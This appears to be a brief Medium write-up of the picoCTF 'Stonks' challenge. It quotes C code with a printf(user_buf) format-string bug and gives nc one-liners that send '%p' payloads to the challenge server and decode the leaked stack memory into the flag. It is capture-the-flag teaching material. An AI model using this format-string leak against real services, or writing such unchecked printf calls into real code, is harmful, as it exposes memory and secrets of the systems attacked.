picoCTF Stonks writeup

make and run it:

gcc vuln.c

If the flag is not found locally, it must be on the remote server.

python3 -c 'print("A" * 200)' > api

it works fine.

char *user_buf = malloc(300 + 1); //Allocates memory
printf("What is your API token?\n"); //Prints input prompt
scanf("%300s", user_buf); //Reads in the user input and stores in user_buf
printf("Buying stonks with token:\n"); //Prints info
printf(user_buf); //Outputs user_buff [VULNERABLE!!]

As we can see, the function type is not specified.

printf(user_buf) Will be affected by the format string.

Remote Attack:

python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 33411 | tr "." "\n" | xxd -r -p | strings -n1
python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 33411 | tr "." "\n" | while read line; do echo $line | xxd -r -p | strings -n1 | rev; done | tr -d "\n" | grep -oE "picoCTF{.*}"




#InfoSec | #RedTeam | #OSINT | #CyberSec | #Pentest

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium


The Problem with Story Points

Class Loading and Unloading in JVM

Top reasons Why and How Golang is Better than Rust?

The Important Role Software Engineers Play in Web Accessibility


How to store secrets in Azure Databricks

Azure Databricks

Frontend Insider #2

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


#InfoSec | #RedTeam | #OSINT | #CyberSec | #Pentest

More from Medium

Agent Sudo: Mission Root

TryHackMe: Internal walkthrough

WordPress: CVE-2021–29447 — TryHackMe Walkthrough

Hack the box shibboleth writeup :